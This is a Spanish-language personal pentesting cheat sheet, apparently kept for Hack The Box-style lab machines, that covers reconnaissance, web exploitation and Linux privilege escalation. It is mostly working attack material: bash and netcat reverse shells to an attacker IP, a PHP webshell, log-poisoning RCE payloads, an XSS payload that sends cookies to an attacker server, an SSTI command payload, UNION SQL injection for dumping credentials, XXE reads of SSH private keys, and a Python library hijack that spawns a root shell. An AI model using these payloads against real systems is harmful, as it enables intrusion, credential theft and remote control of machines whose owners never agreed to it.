//PAGINAS DE INTERES
poner en google:
reverse shell monkey pentester (para buscar formas de obtener una reverse shell via comandos)

hashes.org para crackear hashes :)))

// VULNERABILIDADES IMPORTANTES

dirtypipe







//REVERSE SHELLS

bash -c "bash -i >& /dev/tcp/10.10.14.10/443 0>&1"


--------------------------------///////\\\\\\\--------------------------------------

// CONVERTIDORES DE BASE64/HEX/MD5 Y DEMAS


Para Hexadecimal a texto
echo "cadena" | xargs | xxd -ps -r    

--------------------------------///////\\\\\\\--------------------------------------

//NMAP 
//nmap agilizado
nmap -sS --min-rate 5000 --open -vvv -n -Pn -p- IP -oG allPorts
      ^
      |
tcp-sync-port-scan                


//nmap con puertos ya descubiertos
nmap -sC -sV -p(pego los puertos) IP -oN targeted


//nmap para puertos udp

nmap -sU --top-ports 100 -T5 --open -v -n IP


--------------------------------///////\\\\\\\-------------------------------------- 


// UDP PORTS

Para puertos udp el mas comun es el 161 que corre el servicio snmp.

'snmpwalk -c public -v2c IP 1' es el comando mas usado. siendo public el community mas usado.

con 'onesixtyone IP -c /usr/share/seclists/Discovery/SNMP/snmp-onesixtone.txt' podemos
encontrar community strings.


--------------------------------///////\\\\\\\--------------------------------------


//WFUZZ ANALIZO DIRECTORIOS EN UN HTTP/HTTPS

wfuzz -c -L -t 400 --hc=404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://IP/FUZZ

wfuzz -c -L -t 400 --hc=404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -w /usr/share/wordlists/ext.txt http://IP/FUZZ.FUZ2Z

---

wfuzz -c -L -t 400 --hc=404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -d 'usuario=FUZZ&password=test' http://IP/paneldelogin.php

esto sirve para fuzzear un usuario potencial. ocultariamos los caracteres que salen mucho con -hh y listo! 

---

--------------------------------///////\\\\\\\-------------------------------------- 

//WPSCAN Escaneo de wordpress para sacar informacion

wpscan --url http//IP -e vp,u

--------------------------------///////\\\\\\\-------------------------------------- 

// TRATAMIENTO DE LA TTY

si no tenemos una bash tenemos que:

python3 -c 'import pty;pty.spawn("/bin/bash")'



primero q todo hago esto

script /dev/null -c bash

1) le doy Ctrl + Z para poner en segundo plano la consola
2) Escribo el comando "stty raw -echo;fg" 
3) "reset xterm"
4) "export TERM=xterm" porque todavia no esta la xterm
5) "export SHELL=bash" porque todavia no tengo la /bin/bash
6) Para las filas y columnas le doy "stty rows 52 columns 187"

--------------------------------///////\\\\\\\--------------------------------------

// ENCONTRAR VULNERABILIDADES CON SEARCHSPLOIT

Para actualizar "searchsploit -u"

searchsploit -x (Nombre del servicio) -w               -m        
              ^                        ^                ^
              |                        |                |
     veo el codigo fuente	    veo url     copia en directorio


--------------------------------///////\\\\\\\--------------------------------------

// UTILIDAD METASPLOIT

----PARA ENTRAR A LA MAQUINA VICTIMA----

msfconsole

search <servicio a atacar>

use (nombre del exploit)

seteo("set") los rhost rport y demas

(establezco una reverse/shell) ---> set payload windows/meterpreter/reverse_tcp

show options

seteo("set") los lhost y lport 

exploit

(Parametros de interes abajo)

RHOSTS= remote host
RPORT= remote port
target= tipo de windows

----ADENTRO DE LA MAQUINA VICTIMA----

getuid --> Veo quien soy

sysinfo --> Informacion del sistema vulnerado

shell --> Obtengo una shell interactiva


--------------------------------///////\\\\\\\--------------------------------------

// EXPLOTACION MANUAL SIN HERRAMIENTAS (DE EXPLOIT) DE POR MEDIO

encuentro la vulnerabilidad con searchsploit
lo copio en el dir actual
 
Hago lo que dice el exploit (varia casi siempre)


--------------------------------///////\\\\\\\--------------------------------------

// BURPSUITE

nos permite interceptar peticiones y modificarlas.

primero de todo hacemos el scope a la maquina victima

----WEBSHELL----

si queremos hacer una web shell simple con php seria de este modo:

primero tenemos que interceptar las peticiones con burp, despues pondriamos este codigo dependiendo de
que este validando la web: 

<?php
	echo "<pre>" . shell_excec($_REQUEST['cmd']) . "</pre>";
?>

Una vez hecho esto tendriamos que darle a forward y veriamos donde se esta almacenando ese archivo que
acabamos de subir.

Luego, tendriamos que poner en la barra de direcciones lo siguiente: 
										DATASO:
http://IP/ruta/hasta/el/archivo.php?cmd=(comando que desees)                       ifconfig=ip a


--------------------------------///////\\\\\\\--------------------------------------

// LFI (LOCAL FILE INCLUSION)


----COMO-CONSEGUIRLO----


para conseguir un local file inclusion, podriamos fijarnos si el gestor de contenido es vulnerable a este
tipo de ataque. Con el comando 'searchsploit <Gestor de contenido>'


----SACAR-INFORMACION-CON-UN-LFI----


'/proc/schedstat' y '/proc/sched_debug' pueden llegar a dar informacion



----VER-SI-ESTOY-EN-UN-CONTENEDOR----

Nos vamos a la ruta /proc/net/fib_trie para ver si estoy en un contenedor


---VEO-PUERTOS-INTERNOS----

Podemos tambien irnos a /proc/net/tcp para ver que puertos INTERNOS tiene abierta la maquina.
para hacerlo nos copiamos el texto de esa direccion y nos vamos a nuestra maquina al directorio:
cd /content y luego pegarlo haciendo un 'nano data' para hacerle regex posteriormente:
cat data | tr ':' ' ' | awk '{print $3}' | sort -u
                                             ^
                                             |
                                para que no haya repeticiones
luego hacemos en la consola: 'python3' y pegamos de la siguiente forma:  0xhex



----PASAR-DE-UN-LFI-A-UN-RCE-(VULNERABILIDAD-LOG-POISONING)----


Lo que podemos hacer para cuando tenemos un lfi pasar a un rce seria:



si esta habilitado el apache2 nos vamos a la ruta:
/var/log/apache2/acces.log

si esta existe, mediante el uso de la herramienta curl, modificamos el user-agent:

curl "copiar toda la direccion" -H "User-Agent: <?php system('example:whoami');?>"  


Tambien podriamos, si tenemos acceso a el servicio ssh y a la ruta /var/log/auth.log en el lfi hacemos lo
siguiente:

ssh '<?php system("whoami"); ?>'@IP 

ahora recargamos la pagina en el auth.log y deberiamos ver la ejecucion de comandos.

si queremos entablar una reverse shell, primero, en nuestra consola deberiamos hacer:

----->  echo "nc -e /bin/bash <nuestra ip> <nuestro puerto>" | base64
para obtener el cifrado.

una vez con el cifrado tendriamos que hacer lo siguiente:

-----> echo <cifrado> | base64 -d | bash
                                ^
                                |
                           este parametro
                        decodifica el cifrado            




  
--------------------------------///////\\\\\\\----------------------------------


// RFI (REMOTE FILE INCLUSION)

----COMO-OBTENERLO----

En searchsploit buscamos por el gestor de contenido, plugin o lo que sea que nos pueda dar un rfi.
Nos vamos a monkey pentester para obtener el archivo php de la reverse shelly le cambiamos la ip y el port.

 

--------------------------------///////\\\\\\\----------------------------------

// CROSS-SITE SCRIPTING (HTML INJ Y XSS)

xss ----> <script>alert("HOLAQTAL")</script>

con el xss injection podemos obtener cookies de usuarios, por ejemplo:
si tenemos un panel para postear una nota, hariamos lo siguiente:

nos ponemos un 'python -m SimpleHttpServer 80'

y en el posteo ponemos lo que esta escrito abajo:

<script>document.write('<img src="http://IP/imagen.jpg?cookie=' + document.cookie + '">')</script>

Luego, para utilizar esa cookie que hemos obtenido, nos vamos a interceptar por medio de burpsuite
la carga de la pagina de login y cambiamos la cookie con la del usuario obtenido.


--------------------------------///////\\\\\\\----------------------------------

// CSRF (CROSS-SITE REQUEST FORGERY) 
(no suele servir para htb)

Para ejecutar el CSRF necesitamos de la interaccion de un usuario

nos vamos a un panel de update password con nuestra cuenta y creamos una nueva contrasena pero antes
de darle a submit, lo interceptamos por burpsuite, lo mandamos al repeater (ctrl + r), le damos
click derecho y le ponemos en Change request method para mandarlo por get, si esto funciona es critico
porque esto quiere decir que si le damos ese link (acrotado por ej: tinyurl) a un administrador
(ingenieria social) y lo pega en su buscador, se le cambiaria automaticamente la contrasena a una que 
nosotros hayamos puesto.


--------------------------------///////\\\\\\\----------------------------------

// SSRF (SERVER-SIDE REQUEST FORGERY)

No necesitamos la interaccion del usuario :)

Sirve para cuando no vemos todos los puertos abiertos. De esta forma podemos ver que puertos estan
abiertos y corriendo servidores internos.

Lo que hariamos seria lo siguiente, interceptariamos por burpsuite la peticion al localhost empezando
por el puerto 1.

interceptamos esto que este en un buscador de urls o algo asi. (no en la comun de arriba, en la pagina.)
http://localhost:1
lo mandamos al intruder. ctrl + i
en la formurl=codigo raro
seleccionamos codigo raro y le damos a ctrl+shift+u
seleccionamos el 1 y le damos a "add"
nos vamos a payload y le damos a numbers from 1 a 65535. step 1
le damos a start attack y los que den un length mas largo de lo comun es q generalmente esta abierto.

------
----Server-Side-Template-Inyection----
------

aca podriamos ver un input que se vea reflejado en la pagina entonces hariamos lo siguiente:

para probar si es un SSTI podriamos hacer esto:

poner en el input este codigo  {{7*7}}
si ese codigo nos refleja 49, entonces es vulnerable y accederiamos a la pagina de payloadallthethings en github.
ahi nos vamos al apartado de ssti y copiamos un codigo y probamos.

este es muy comun: {{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}
											     ^
											     |
								           aca ponemos el comando que queramos.


--------------------------------///////\\\\\\\----------------------------------

// SQL INYECTION


----SQLmap----


necesitamos tener un panel de autenticacion.
buscamos el login por searchsploit y nos fijamos si tiene lugar a sqlinyection.
nos fijamos la ruta url para inyectarlo y cachapum:


sqlmap -u "http://IP/ruta/hacia/vulnerabilidad" --cookie "nuestra cookie (si tenemos que logearnos)"
--dbs --batch --random-agent (si ya sabemos que tipo de sql es, ponemos: --dbms=<mysql> por ejemplo)
  ^
  |
database

otros parametros para cuando ya tenemos las databases:
-D (la base que queremos acceder) en vez de --dbs
y le agragamos tambien --tables para acceder a las tablas

despues una vez obtenidas las tablas, le damos estos parametros:
en vez de --tables le damos -T (la tabla que deseamos obtener)
tambien le damos el parametro --columns para ver las columnas
le damos a correr denuevo y cuando ya tenemos las columnas, en vez del parametro --columns
le damos el parametro:
-C (nombres de las columnas separadas por , )
 


----INYECCION-MANUAL----


lo primero que hacemos es ir a la ruta que es inyectable y donde dice id="algo" o lo que sea le ponemos
esto: por ejemplo (id=1 order by 100-- -). asi vemos cuantas columnas hay.
                                  ⤥
				    bajamos este numero hasta que encontremos la cantidad de columnas.

luego en lugar de donde decia order by 100 lo cambio por esto:
"union select 1,2,3,4,...,n-- -" siendo n la cantidad de columnas que hayamos encontrado.

Ahora, reemplazamos algun numero que nos aparezca por un comando.
 
Comandos utiles de sql:

-database() -----> para saber en que database estamos

-user() -----> para saber que usuario esta corriendo la base de datos.

-@@version -----> vemos la version de sql en uso.

-load_file('/etc/passwd') -----> podemos ver archivos internos (a veces no funciona).

-schema_name ------> para ver todas las bases de datos (su uso es de la siguiente manera:
"union select 1,schema_name,3,4,...,n from information_schema.schemata-- -") 

si a todo esto le agrego un (del ejemplo anterior:
"union select 1,schema_name,3,4,...,n from information_schema.schemata limit <1>,1") 
podemos limitar lo que se nos muestra                                         ^
                                                                              |
                                                                     solo cambiamos este
								     parametro.     


una vez que sabemos la database ponemos lo siguiente:
union select 1,table_name,3,4,...,n from information_schema.tables where table_schema = "db encontrada"-- -

cuando ya tenemos la table ponemos lo siguiente:
union select 1,column_name,3,4,...,n from information_schema.columns where table_schema = "db encontrada" and table_name = "tabla encontrada"-- -

una vez que tengamos todo lo deseado y querramos ver contrasenas, usuarios, etc, podriamos hacer lo siguiente:
union select 1,concat(username,0x,password),3,4,...,n from dbencontrada.tablaencontrada-- -

o tambien podria ser solo asi:

union select 1,group_concat(username,0x3a,password),3,4,...,n from tablaencontrada-- -


si por alguna razon cuando queremos inyectar el nombre de una tabla, schema o columna no nos deja podriamos hacer lo
siguiente, en una terminal poner:

echo "tabla, schema o columna" | xxd -ps para tenerlo sanitizado, lo copiamos sin el 0a del final y le agregamos
un 0x al principio.

y lo pondriamos de la siguiente forma (por ejemplo):
union select 1,table_name,3,4,...,n from information_schema.tables where table_schema = 0x736368656d61-- -



--------------------------------///////\\\\\\\----------------------------------

// PADDING ORACLE ATTACK

sirve para paginas de login donde nos podamos registrar.

tendriamos que ver como esta hecha la cookie. Si esta hecha con CBC cypher podemos hacer muchos "exploits caseros":

1) Una opcion seria con padbuster de la siguiente forma:
padbuster http://IP/paginadelogin cookie-en-cifrado numero-de-bytes -cookie "tipo=cookie-en-cifrado" -encoding 0
                                                         ⤥⤥⤥
							probamos desde el 1 hasta el 10 por ej

si esto funciona veriamos la cookie en texto claro (por ejemplo):
user=javi

entonces, como funciono podriamos hacer lo siguiente:
padbuster http://IP/paginadelogin cookie-en-cifrado numero-de-bytes -cookie "tipo=cookie-en-cifrado" -encoding 0 -plaintext "user=admin" 

una vez obtenida la cookie la pegamos en el cookie editor y cachapum.


2) Otra opcion que podriamos probar seria la de en la pagina de registro poner en username:
admin= y le doy a enter.
la proxima vez que lo querramos hacer vamos a tener que poner admin== y asi sucesicamente...


3) La otra opcion seria mediante burpsuite (BIT FLIPPER ATTACK):
-creamos un usuario que se llame (por ejemplo): bdmin
-una vez dentro interceptamos una peticion recargando esa pagina ya logueada.
-lo mandamos al intruder
-seleccionamos solo la cookie sin lo de atras del = y le damos a 'add'.
-nos vamos a la pestana payload y en payload type seleccionamos bit flipper.
-Format to original data: Literal value
-nos vamos a options y si tenemos la opcion lo grepeamos por lo que diga mi nombre por ejemplo:
"you are currently logged in as bdmin".
-start attack
-ahora buscamos hasta que diga admin y listo.
-copiariamos la cookie computada y y la cambiariamos mediante el cookie editor o interceptando por burpsuite.


--------------------------------///////\\\\\\\----------------------------------

// SHELLSHOCK ATTACK

Cuando entramos a un webmin, ponemos un usuario y contrasena por ejemplo: admin admin
y no entra, en la barra de direcciones nos sale un archivo .cgi , .pl o .sh.
se trata de un shellshock attack.

buscamos en el buscador "shellshock attack how attackers" y le damos al plrimer "blog".
esta pagina nos muestra como cambiar el user agent para este caso.


--------------------------------///////\\\\\\\----------------------------------


// XML EXTERNAL ENTITY INYECTION (XXE)

cuando haya posibilidad de un xxe podriamos hacer esto:

<?xml version="1.0" encoding="ISO-8859-1"?>
!DOCTYPE foo [
	<!ELEMENT foo ANY >
	<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
aca abajo lo que nos pida poner y reemplazamos un texto por <&xxe;>

llamamos a ese archivo file.xml

tambien, en lugar de buscar por el /etc/passwd podriamos mirar el 
/home/usuario/.ssh/id_rsa
para encontrar la clave rsa privada.

una vez encontrada copiamos desde ------begin rsa private key-------
hasta ------end rsa private key--------
con esos dos incluidos.

y nos creamos un archivo llamado id_rsa y pegamos la clave entera.

le asignamos el privilegio 600:
chmod 600 id_rsa

luego para entrar por ssh hariamos:

ssh -i id_rsa USUARIO@IP 

y ya esta!


--------------------------------///////\\\\\\\----------------------------------

// VIRTUAL HOSTING

para ver si se esta aplicando virtual hosting podemos usar la herramienta dig:

dig @IP dns

por ejemplo:

dig @190.210.186.109 arsec.com.ar <valores>

en valores podemos poner los siguientes:

-ns para encontrar servidores ns
-mx para encontrar servidores de mail
-axfr encontramos subdominios validos

entonces todos los subdominios validos los ponemos en el /etc/hosts de la siguiente forma.
ponemos el dominio y al lado los subdominios por ejemplo:

10.10.10.123 uploads.friendzone.red


--------------------------------///////\\\\\\\----------------------------------

// INSECURE DESERIALIZATION

no entendi un pingo	


--------------------------------///////\\\\\\\----------------------------------

// USER PRIVILIGE ESCALATION

----PAGINA-DE-INTERES----
gtfobins.github.io

en esta pagina simplemente buscamos el comando y vemos lo que tenemos que hacer para convertirnos en #.




---EXPLOTACION-DEL-SUDOERS----

Si el usuario en el que estamos actuando tiene permisos sudoers, es decir, le dieron
algun permiso en el /etc/sudoers, en principio no lo sabemos. Lo que podemos hacer
es un sudo -l para ver si tiene permisos sudoers. Si tiene alguno va a aparecer ahi.

Para explotarlo simplemente nos vamos a la pagina gtfobins.github.io y ahi buscamos
el comando en el que tenemos privilegios y en el apartado sudo vemos lo que tenemos
q hacer.
 
---EXPLOTACION-DE-PERMISO-SUID----

para asignar un permiso suid seria chmod 4<755> por ejemplo.

buscamos privilegios suid de la siguiente forma:
---> find \-perm -4000

nos fijamos en alguno fuera de lo normal y lo buscamos en gtfo.

---EXPLOTACION-DE-CAPABILITIES---- 


Con 'getcap -r / 2>/dev/null' podemos ver las capabilities. podriamos ejecutar este comando:

binario_corriendo -r "posix_setuid(0); system('/bin/bash');"

y listo!


---LIBRARY-HIJACKING----

si tenemos permisos de sudo en pyhton, por ejemplo,
podriamos ver el path de una libreria, ejemplo (sys):

python
import sys
print sys.path

si con esos comandos vemos que el primer directorio es el actual o tenemos
permiso de escritura en algun diectorio antes de la libreria, podriamos
hacer lo siguiente:

nos creamos un archivo cualquiera:

nano javi.py

dentro de ese archivo ponemos esto (ES UN EJEMPLO): 

-----------------------------------------------------

#!/usr/bin/python

import hashlib, sys

if len(sys.argv) != 2:
        print"hola"
        sys.exit(1)

if __name__ == '__main__':
        palabra = sys.argv[1]

        md5 = hashlib.md5(palabra).hexdigest()

        print md5

-------------------------------------------------------
En el lugar donde dice import es la libreria que vamos a crear
con el comando malicioso para ser root.

ahora creariamos la libreria nosotros mismos:

nano hashlib.py

y dentro ponemos esto:

--------------------------------------------------------

import os

os.setuid(0)
os.system("/bin/bash")

--------------------------------------------------------

ahora ejecutamos el exam.py y guala!


---EXPLOTACION-DEL-KERNEL----

Hacemos un 'uname -a' en la consola y nos va a salir algo como esto

Linux <nombre> version-algo-mas y mas cosas.

Donde version puede ser igual a 2.6.31.
Nos copiariamos la version y en google  (o searchsploit)
buscamos 2.6.31 exploit kernel.
Ahi seguimos instrucciones.

Generalmente si es menor a 4.x.x podemos hacer cositas.
